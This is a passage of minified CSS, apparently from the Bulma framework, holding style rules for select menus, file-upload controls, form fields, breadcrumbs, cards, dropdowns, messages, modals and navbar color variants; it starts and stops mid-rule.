select.is-hovered{border-color:#ffd970}.select.is-warning select:focus,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select.is-active{box-shadow:0 0 0 .125em #ffe08a40}.select.is-danger:not(:hover):after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select:hover,.select.is-danger select.is-hovered{border-color:#ef2e55}.select.is-danger select:focus,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select.is-active{box-shadow:0 0 0 .125em #f1466840}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled:after{border-color:#7a7a7a!important;opacity:.5}.select.is-fullwidth,.select.is-fullwidth select{width:100%}.select.is-loading:after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white:hover .file-cta,.file.is-white.is-hovered .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white:focus .file-cta,.file.is-white.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffffff40;color:#0a0a0a}.file.is-white:active .file-cta,.file.is-white.is-active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black:hover .file-cta,.file.is-black.is-hovered .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black:focus .file-cta,.file.is-black.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #0a0a0a40;color:#fff}.file.is-black:active .file-cta,.file.is-black.is-active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.file.is-light:hover .file-cta,.file.is-light.is-hovered .file-cta{background-color:#eee;border-color:transparent;color:#000000b3}.file.is-light:focus .file-cta,.file.is-light.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f5f5f540;color:#000000b3}.file.is-light:active .file-cta,.file.is-light.is-active .file-cta{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark:hover .file-cta,.file.is-dark.is-hovered .file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark:focus .file-cta,.file.is-dark.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #36363640;color:#fff}.file.is-dark:active .file-cta,.file.is-dark.is-active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary:hover .file-cta,.file.is-primary.is-hovered .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary:focus .file-cta,.file.is-primary.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #00d1b240;color:#fff}.file.is-primary:active .file-cta,.file.is-primary.is-active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#485fc7;border-color:transparent;color:#fff}.file.is-link:hover .file-cta,.file.is-link.is-hovered .file-cta{background-color:#3e56c4;border-color:transparent;color:#fff}.file.is-link:focus .file-cta,.file.is-link.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #485fc740;color:#fff}.file.is-link:active .file-cta,.file.is-link.is-active .file-cta{background-color:#3a51bb;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3e8ed0;border-color:transparent;color:#fff}.file.is-info:hover .file-cta,.file.is-info.is-hovered .file-cta{background-color:#3488ce;border-color:transparent;color:#fff}.file.is-info:focus .file-cta,.file.is-info.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #3e8ed040;color:#fff}.file.is-info:active .file-cta,.file.is-info.is-active .file-cta{background-color:#3082c5;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c78e;border-color:transparent;color:#fff}.file.is-success:hover .file-cta,.file.is-success.is-hovered .file-cta{background-color:#3ec487;border-color:transparent;color:#fff}.file.is-success:focus .file-cta,.file.is-success.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #48c78e40;color:#fff}.file.is-success:active .file-cta,.file.is-success.is-active .file-cta{background-color:#3abb81;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffe08a;border-color:transparent;color:#000000b3}.file.is-warning:hover .file-cta,.file.is-warning.is-hovered .file-cta{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.file.is-warning:focus .file-cta,.file.is-warning.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffe08a40;color:#000000b3}.file.is-warning:active .file-cta,.file.is-warning.is-active .file-cta{background-color:#ffd970;border-color:transparent;color:#000000b3}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger:hover .file-cta,.file.is-danger.is-hovered .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger:focus .file-cta,.file.is-danger.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f1466840;color:#fff}.file.is-danger:active .file-cta,.file.is-danger.is-active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-normal{font-size:1rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name .file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:none;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:inherit;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon .fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#485fc7}.help.is-info{color:#3e8ed0}.help.is-success{color:#48c78e}.help.is-warning{color:#ffe08a}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered{z-index:2}.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons .control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]).is-active{z-index:3}.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth .control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width: 769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width: 768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width: 769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width: 769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:inherit}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right .input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading:after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#485fc7;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li:before{color:#b5b5b5;content:"/"}.breadcrumb ul,.breadcrumb ol{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li:before{content:"→"}.breadcrumb.has-bullet-separator li+li:before{content:"•"}.breadcrumb.has-dot-separator li+li:before{content:"·"}.breadcrumb.has-succeeds-separator li+li:before{content:"≻"}.card{background-color:#fff;border-radius:.25rem;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;max-width:100%;position:relative}.card-header:first-child,.card-content:first-child,.card-footer:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-header:last-child,.card-content:last-child,.card-footer:last-child{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em #0a0a0a1a;display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0;align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-image:first-child img{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-image:last-child img{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;padding-bottom:.5rem;padding-top:.5rem}.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:inherit;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#485fc7;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile,.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width: 769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .title,.level-item .subtitle{margin-bottom:0}@media screen and (max-width: 768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width: 769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width: 768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width: 769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and (min-width: 769px),print{.level-right{display:flex}}.media{align-items:flex-start;display:flex;text-align:inherit}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:inherit}@media screen and (max-width: 768px){.media-content{overflow-x:auto}}.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#485fc7;color:#fff}.menu-list li ul{border-left:1px solid #dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:#000000b3}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eff1fa}.message.is-link .message-header{background-color:#485fc7;color:#fff}.message.is-link .message-body{border-color:#485fc7;color:#3850b7}.message.is-info{background-color:#eff5fb}.message.is-info .message-header{background-color:#3e8ed0;color:#fff}.message.is-info .message-body{border-color:#3e8ed0;color:#296fa8}.message.is-success{background-color:#effaf5}.message.is-success .message-header{background-color:#48c78e;color:#fff}.message.is-success .message-body{border-color:#48c78e;color:#257953}.message.is-warning{background-color:#fffaeb}.message.is-warning .message-header{background-color:#ffe08a;color:#000000b3}.message.is-warning .message-body{border-color:#ffe08a;color:#946c00}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:#0a0a0adb}.modal-content,.modal-card{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width: 769px){.modal-content,.modal-card{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:none;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-head,.modal-card-foot{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid #dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand>.navbar-item,.navbar.is-white .navbar-brand .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width: 1024px){.navbar.is-white .navbar-start>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-end .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white .navbar-start>a.navbar-item:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-start .navbar-link:after,.navbar.is-white .navbar-end .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand>.navbar-item,.navbar.is-black .navbar-brand .navbar-link{color:#fff}.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-black .navbar-start>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-end .navbar-link{color:#fff}.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black .navbar-start>a.navbar-item:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-start .navbar-link:after,.navbar.is-black .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:#000000b3}.navbar.is-light .navbar-brand>.navbar-item,.navbar.is-light .navbar-brand .navbar-link{color:#000000b3}.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-light .navbar-start>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-end .navbar-link{color:#000000b3}.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light .navbar-start>a.navbar-item:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-start .navbar-link:after,.navbar.is-light .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#000000b3}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand>.navbar-item,.navbar.is-dark .navbar-brand .navbar-link{color:#fff}.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-dark .navbar-start>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-end .navbar-link{color:#fff}.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark .navbar-start>a.navbar-item:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start 